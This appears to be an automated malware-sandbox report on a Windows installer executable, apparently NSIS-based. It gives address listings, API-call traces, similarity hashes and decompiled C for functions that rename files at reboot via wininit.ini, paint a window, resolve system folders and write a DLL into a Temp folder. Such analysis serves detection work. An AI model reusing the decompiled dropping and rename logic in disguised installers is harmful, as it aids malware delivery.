0x004040d3
0x004040eb
0x004040fe
0x0040410e
0x00404110
0x00404110
0x004040c5
0x0040411a
0x00000000
0x00404125
0x00404129
0x0040413a
0x0040413a
0x00404140
0x0040414e
0x0040414e
0x00000000
0x00404152
0x0040411a
0x00404030
0x00000000
0x00404044
0x0040404a
0x00404050
0x00000000
0x00000000
0x00404075
0x00404077
0x0040407c
0x00000000
0x0040407c
0x00404030
0x00403f05
0x00403f08
0x00403f0d
0x00403f1e
0x00403f1e
0x00403f25
0x00403f28
0x00403f2a
0x00403f2f
0x00403f38
0x00403f3e
0x00403f4a
0x00403f4d
0x00403f56
0x00403f5b
0x00403f5e
0x00403f63
0x00403f7a
0x00403f81
0x00403f94
0x00403f97
0x00403fac
0x00403fb3
0x00403fb8
0x00403fbd
0x00403fbd
0x00403fcc
0x00403fdb
0x00403fdd
0x00403ff3
0x00404002
0x00404004
0x00000000

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F7A
GetDlgItem.USER32 ref: 00403F8E
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FAC
GetSysColor.USER32(?), ref: 00403FBD
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FCC
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FDB
lstrlenA.KERNEL32(?), ref: 00403FE5
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FF3
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404002
GetDlgItem.USER32 ref: 00404065
SendMessageA.USER32(00000000), ref: 00404068
GetDlgItem.USER32 ref: 00404093
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040D3
LoadCursorA.USER32 ref: 004040E2
SetCursor.USER32(00000000), ref: 004040EB
ShellExecuteA.SHELL32(0000070B,open,007A1F20,00000000,00000000,00000001), ref: 004040FE
LoadCursorA.USER32 ref: 0040410B
SetCursor.USER32(00000000), ref: 0040410E
SendMessageA.USER32(00000111,00000001,00000000), ref: 0040413A
SendMessageA.USER32(00000010,00000000,00000000), ref: 0040414E

Strings

open, xrefs: 004040F6
N, xrefs: 00404081

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$open
API String ID: 3615053054-904208323
Opcode ID: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
Instruction ID: 2049aa6b61ecefec59fc3e575142d3045787f4aa2f6754ef1ed68d4f44ea64a4
Opcode Fuzzy Hash: f57dfcbcc2afe5e5f36277ccc321ea508118caa9513741def9589acdf25ed01d
Instruction Fuzzy Hash: 7C61A171A40309BFEB109F60CC45F6A7B69EB94715F108026FB01BA2D1C7B8E991CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00405707, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 151
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00405707(long _a4, long _a16) {
				CHAR* _v0;
				intOrPtr* _t13;
				long _t14;
				int _t19;
				void* _t27;
				long _t28;
				intOrPtr* _t36;
				int _t42;
				intOrPtr* _t43;
				long _t48;
				CHAR* _t50;
				void* _t52;
				void* _t54;

				_t13 = E00405CD2("KERNEL32.dll", "MoveFileExA");
				_t50 = _v0;
				if(_t13 != 0) {
					_t19 =  *_t13(_a4, _t50, 5);
					if(_t19 != 0) {
						L16:
						 *0x7a3010 =  *0x7a3010 + 1;
						return _t19;
					}
				}
				 *0x7a1710 = 0x4c554e;
				if(_t50 == 0) {
					L5:
					_t14 = GetShortPathNameA(_a4, 0x7a1188, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						_t42 = wsprintfA(0x7a0d88, "%s=%s\r\n", 0x7a1710, 0x7a1188);
						GetWindowsDirectoryA(0x7a1188, 0x3f0);
						lstrcatA(0x7a1188, "\\wininit.ini");
						_t19 = CreateFileA(0x7a1188, 0xc0000000, 0, 0, 4, 0x8000080, 0);
						_t54 = _t19;
						if(_t54 == 0xffffffff) {
							goto L16;
						}
						_t48 = GetFileSize(_t54, 0);
						_t5 = _t42 + 0xa; // 0xa
						_t52 = GlobalAlloc(0x40, _t48 + _t5);
						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
							L15:
							_t19 = CloseHandle(_t54);
							goto L16;
						} else {
							if(E00405624(_t52, "[Rename]\r\n") != 0) {
								_t27 = E00405624(_t25 + 0xa, "\n[");
								if(_t27 == 0) {
									L13:
									_t28 = _t48;
									L14:
									E00405670(_t52 + _t28, 0x7a0d88, _t42);
									SetFilePointer(_t54, 0, 0, 0);
									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
									GlobalFree(_t52);
									goto L15;
								}
								_t36 = _t27 + 1;
								_t43 = _t36;
								if(_t36 >= _t52 + _t48) {
									L21:
									_t28 = _t36 - _t52;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t42)) =  *_t43;
									_t43 = _t43 + 1;
								} while (_t43 < _t52 + _t48);
								goto L21;
							}
							E004059BF(_t52 + _t48, "[Rename]\r\n");
							_t48 = _t48 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E00405690(_t50, 0, 1));
					_t14 = GetShortPathNameA(_t50, 0x7a1710, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						goto L5;
					}
				}
				return _t14;
			}

0x00405715
0x0040571c
0x00405720
0x00405729
0x0040572d
0x00405879
0x00405879
0x00000000
0x00405879
0x0040572d
0x00405739
0x0040574f
0x00405777
0x00405782
0x00405786
0x004057a9
0x004057b1
0x004057bd
0x004057d4
0x004057da
0x004057df
0x00000000
0x00000000
0x004057ee
0x004057f0
0x004057fd
0x00405801
0x00405872
0x00405873
0x00000000
0x0040581d
0x0040582a
0x0040588f
0x00405896
0x0040583d
0x0040583d
0x0040583f
0x00405848
0x00405853
0x00405865
0x0040586c
0x00000000
0x0040586c
0x00405898
0x0040589e
0x004058a0
0x004058af
0x004058af
0x00000000
0x00000000
0x00000000
0x00000000
0x004058a2
0x004058a2
0x004058a4
0x004058a7
0x004058ab
0x00000000
0x004058a2
0x00405835
0x0040583a
0x00000000
0x0040583a
0x00405801
0x00405751
0x0040575c
0x00405765
0x00405769
0x00000000
0x00000000
0x00405769
0x00405883

APIs

Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3

CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 0040575C
GetShortPathNameA.KERNEL32 ref: 00405765
GetShortPathNameA.KERNEL32 ref: 00405782
wsprintfA.USER32 ref: 004057A0
GetWindowsDirectoryA.KERNEL32(007A1188,000003F0,?,?,00000000,000000F1,?), ref: 004057B1
lstrcatA.KERNEL32(007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057BD
CreateFileA.KERNEL32(007A1188,C0000000,00000000,00000000,00000004,08000080,00000000,007A1188,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D4
GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 004057E8
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004057F7
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040580D
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A0D88,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405853
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405865
GlobalFree.KERNEL32 ref: 0040586C
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405873

Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
Part of subcall function 00405624: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B

Strings

%s=%s, xrefs: 00405796
[Rename], xrefs: 0040581D, 0040582F
MoveFileExA, xrefs: 0040570B
KERNEL32.dll, xrefs: 00405710
\wininit.ini, xrefs: 004057B7

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
API String ID: 3633819597-1342836890
Opcode ID: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
Instruction ID: e9cd1c615693de8fff4c10b400b586db3ed10c1a7fdb79d3500086280aae1fa0
Opcode Fuzzy Hash: 88cf286bee47e5cf7353a5d77c90152df42e9e7f5ff866319d29b32e6d27b106
Instruction Fuzzy Hash: 8F412132640A057AE32027228C49F6B3A5CDF95745F144636FE06F62D2EA78EC018AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a2f88;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x7a2780, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f84;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,007A2780,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
Instruction ID: ce6c75dd9c322714a436959803478fdb1fd492375a9fced856522196e90364b0
Opcode Fuzzy Hash: d7a2dd7084ad759c097eb5b53d13dae876555f77d0d065bcf363b9c8763e90da
Instruction Fuzzy Hash: 9E41BA71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C738EA50DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004059E1, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 180
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004059E1(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				CHAR* _t35;
				signed int _t37;
				signed int _t38;
				signed int _t49;
				char _t51;
				signed int _t61;
				char* _t62;
				char _t67;
				signed int _t69;
				CHAR* _t79;
				signed int _t86;
				signed int _t88;
				void* _t89;

				_t61 = _a8;
				if(_t61 < 0) {
					_t61 =  *( *0x7a275c - 4 + _t61 * 4);
				}
				_t62 = _t61 +  *0x7a2fb8;
				_t35 = 0x7a1f20;
				_t79 = 0x7a1f20;
				if(_a4 - 0x7a1f20 < 0x800) {
					_t79 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t67 =  *_t62;
					_a11 = _t67;
					if(_t67 == 0) {
						break;
					}
					__eflags = _t79 - _t35 - 0x400;
					if(_t79 - _t35 >= 0x400) {
						break;
					}
					_t62 = _t62 + 1;
					__eflags = _t67 - 0xfc;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t79 = _t67;
							_t79 =  &(_t79[1]);
							__eflags = _t79;
						} else {
							 *_t79 =  *_t62;
							_t79 =  &(_t79[1]);
							_t62 = _t62 + 1;
						}
						continue;
					}
					_t37 =  *((char*)(_t62 + 1));
					_t69 =  *_t62;
					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
					_v28 = _t69;
					_v20 = _t37;
					_t70 = _t69 | 0x00008000;
					_t38 = _t37 | 0x00008000;
					_v24 = _t69 | 0x00008000;
					_t62 = _t62 + 2;
					__eflags = _a11 - 0xfe;
					_v16 = _t38;
					if(_a11 != 0xfe) {
						__eflags = _a11 - 0xfd;
						if(_a11 != 0xfd) {
							__eflags = _a11 - 0xff;
							if(_a11 == 0xff) {
								__eflags = (_t38 | 0xffffffff) - _t86;
								E004059E1(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
							}
							L38:
							_t79 =  &(_t79[lstrlenA(_t79)]);
							_t35 = 0x7a1f20;
							continue;
						}
						__eflags = _t86 - 0x1b;
						if(_t86 != 0x1b) {
							__eflags = (_t86 << 0xa) + 0x7a4000;
							E004059BF(_t79, (_t86 << 0xa) + 0x7a4000);
						} else {
							E0040591D(_t79,  *0x7a2f84);
						}
						__eflags = _t86 + 0xffffffeb - 6;
						if(_t86 + 0xffffffeb < 6) {
							L29:
							E00405BFB(_t79);
						}
						goto L38;
					}
					_a8 = _a8 & 0x00000000;
					 *_t79 =  *_t79 & 0x00000000;
					_t88 = 4;
					__eflags = _v20 - _t88;
					if(_v20 != _t88) {
						_t49 = _v28;
						__eflags = _t49 - 0x2b;
						if(_t49 != 0x2b) {
							__eflags = _t49 - 0x26;
							if(_t49 != 0x26) {
								__eflags = _t49 - 0x25;
								if(_t49 != 0x25) {
									__eflags = _t49 - 0x24;
									if(_t49 != 0x24) {
										goto L19;
									}
									GetWindowsDirectoryA(_t79, 0x400);
									goto L18;
								}
								GetSystemDirectoryA(_t79, 0x400);
								goto L18;
							}
							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							E004059BF(_t79, "C:\\Program Files");
							goto L18;
						} else {
							E004058B3(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
							L18:
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							goto L19;
						}
					} else {
						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
						L19:
						__eflags =  *0x7a3004;
						if( *0x7a3004 == 0) {
							_t88 = 2;
						}
						do {
							_t88 = _t88 - 1;
							_t51 = SHGetSpecialFolderLocation( *0x7a2f84,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
							__eflags = _t51;
							if(_t51 != 0) {
								 *_t79 =  *_t79 & 0x00000000;
								__eflags =  *_t79;
								goto L25;
							}
							__imp__SHGetPathFromIDListA(_v8, _t79);
							_v12 = _t51;
							E0040521C(_t70, _v8);
							__eflags = _v12;
							if(_v12 != 0) {
								break;
							}
							L25:
							__eflags = _t88;
						} while (_t88 != 0);
						__eflags =  *_t79;
						if( *_t79 != 0) {
							__eflags = _a8;
							if(_a8 != 0) {
								lstrcatA(_t79, _a8);
							}
						}
						goto L29;
					}
				}
				 *_t79 =  *_t79 & 0x00000000;
				if(_a4 == 0) {
					return _t35;
				}
				return E004059BF(_a4, _t35);
			}

0x004059e8
0x004059ef
0x00405a00
0x00405a00
0x00405a0a
0x00405a0c
0x00405a13
0x00405a1b
0x00405a21
0x00405a24
0x00405a24
0x00405bd5
0x00405bd5
0x00405bd9
0x00405bdc
0x00000000
0x00000000
0x00405a31
0x00405a37
0x00000000
0x00000000
0x00405a3d
0x00405a3e
0x00405a41
0x00405bc8
0x00405bd2
0x00405bd4
0x00405bd4
0x00405bca
0x00405bcc
0x00405bce
0x00405bcf
0x00405bcf
0x00000000
0x00405bc8
0x00405a47
0x00405a4b
0x00405a5b
0x00405a62
0x00405a65
0x00405a68
0x00405a6a
0x00405a6d
0x00405a70
0x00405a71
0x00405a75
0x00405a78
0x00405b73
0x00405b77
0x00405ba7
0x00405bab
0x00405bb0
0x00405bb4
0x00405bb4
0x00405bb9
0x00405bbf
0x00405bc1
0x00000000
0x00405bc1
0x00405b79
0x00405b7c
0x00405b91
0x00405b98
0x00405b7e
0x00405b85
0x00405b85
0x00405ba0
0x00405ba3
0x00405b6b
0x00405b6c
0x00405b6c
0x00000000
0x00405ba3
0x00405a7e
0x00405a82
0x00405a87
0x00405a88
0x00405a8b
0x00405a96
0x00405a99
0x00405a9c
0x00405ab5
0x00405ab8
0x00405ae5
0x00405ae8
0x00405af8
0x00405afb
0x00000000
0x00000000
0x00405b03
0x00000000
0x00405b03
0x00405af0
0x00000000
0x00405af0
0x00405aca
0x00405acf
0x00405ad2
0x00000000
0x00000000
0x00405ade
0x00000000
0x00405a9e
0x00405aae
0x00405b09
0x00405b09
0x00405b0c
0x00000000
0x00000000
0x00000000
0x00405b0c
0x00405a8d
0x00405a8d
0x00405b0e
0x00405b0e
0x00405b15
0x00405b19
0x00405b19
0x00405b1a
0x00405b1d
0x00405b29
0x00405b2f
0x00405b31
0x00405b50
0x00405b50
0x00000000
0x00405b50
0x00405b37
0x00405b40
0x00405b43
0x00405b48
0x00405b4c
0x00000000
0x00000000
0x00405b53
0x00405b53
0x00405b53
0x00405b57
0x00405b5a
0x00405b5c
0x00405b60
0x00405b66
0x00405b66
0x00405b60
0x00000000
0x00405b5a
0x00405a8b
0x00405be2
0x00405bec
0x00405bf8
0x00405bf8
0x00000000

APIs

SHGetSpecialFolderLocation.SHELL32(00404D9A,00789938,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000), ref: 00405B29
SHGetPathFromIDListA.SHELL32(00789938,007A1F20), ref: 00405B37
lstrcatA.KERNEL32(007A1F20,00000000), ref: 00405B66
lstrlenA.KERNEL32(007A1F20,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000,00000000,0078E938,00789938), ref: 00405BBA

Strings

ProgramFilesDir, xrefs: 00405ABB
C:\Program Files, xrefs: 00405AD8
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405AA4, 00405AC0
CommonFilesDir, xrefs: 00405A9F

Memory Dump Source

Source File: 00000000.00000002.242105595.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.242102559.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242113369.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.242118014.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242146770.000000000077A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242152575.0000000000784000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242156902.0000000000788000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242164269.0000000000795000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242170391.00000000007A1000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242174688.00000000007A9000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.242178100.00000000007AC000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 4227507514-3711765563
Opcode ID: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
Instruction ID: 88f6e72dca0f61d75e3a0e3e21e18f1b78018e843eea250326dc72cf64c4fd20
Opcode Fuzzy Hash: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
Instruction Fuzzy Hash: 20512671904A44AAEB206B248C84B7F3B74EB52324F20823BF941B62C2D77C7941DF5E

Uniqueness

Uniqueness Score: -1.00%

Function 004026FA, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 100
memoryfilestringCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E004026FA() {
				void* _t23;
				void* _t28;
				long _t33;
				struct _OVERLAPPED* _t48;
				void* _t51;
				void* _t53;
				void* _t54;
				CHAR* _t55;
				void* _t58;
				void* _t59;
				void* _t60;

				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
				_t54 = E00402A9A(_t48);
				_t23 = E00405538(_t54);
				_push(_t54);
				if(_t23 == 0) {
					lstrcatA(E004054CC(E004059BF("C:\Users\alfons\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll", "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
					_t55 = 0x40a018;
				} else {
					_push(0x40a018);
					E004059BF();
				}
				E00405BFB(_t55);
				_t28 = E00405690(_t55, 0x40000000, 2);
				 *(_t60 + 8) = _t28;
				if(_t28 != 0xffffffff) {
					_t33 =  *0x7a2f8c;
					 *(_t60 - 0x2c) = _t33;
					_t53 = GlobalAlloc(0x40, _t33);
					if(_t53 != _t48) {
						E004030FF(_t48);
						E004030CD(_t53,  *(_t60 - 0x2c));
						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
						 *(_t60 - 0x30) = _t58;
						if(_t58 != _t48) {
							_push( *(_t60 - 0x1c));
							_push(_t58);
							_push(_t48);
							_push( *((intOrPtr*)(_t60 - 0x20)));
							E00402EBD();
							while( *_t58 != _t48) {
								_t59 = _t58 + 8;
								 *(_t60 - 0x38) =  *_t58;
								E00405670( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
								_t58 = _t59 +  *(_t60 - 0x38);
							}
							GlobalFree( *(_t60 - 0x30));
						}
						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
						GlobalFree(_t53);
						_push(_t48);
						_push(_t48);
						_push( *(_t60 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD();
					}
					CloseHandle( *(_t60 + 8));
					_t55 = 0x40a018;
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
					_t51 = 0xffffffef;
					DeleteFileA(_t55);
					 *((intOrPtr*)(_t60 - 4)) = 1;
				}
				_push(_t51);
				E00401428();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t60 - 4));
				return 0;
			}

0x004026fb
0x00402707
0x0040270a
0x00402711
0x00402712
0x00402737
0x0040273c
0x00402714
0x00402719
0x0040271a
0x0040271a
0x00402742
0x0040274f
0x00402757
0x0040275a
0x00402760
0x0040276e
0x00402773
0x00402777
0x0040277a
0x00402783
0x0040278f
0x00402793
0x00402796
0x00402798
0x0040279b
0x0040279c
0x0040279d
0x004027a0
0x004027bf
0x004027ac
0x004027b4
0x004027b7
0x004027bc
0x004027bc
0x004027c6
0x004027c6
0x004027d8
0x004027df
0x004027e5
0x004027e6
0x004027e7
0x004027ea
0x004027f1
0x004027f1
0x004027f7
0x004027fd
0x004027fd
0x00402807
0x00402808
0x0040280c
0x0040280e
0x00402814
0x00402814
0x0040281b
0x004021e8
0x00402932
0x0040293e

APIs

lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
GlobalFree.KERNEL32 ref: 004027C6
WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
GlobalFree.KERNEL32 ref: 004027DF
CloseHandle.KERNEL32(?), ref: 004027F7
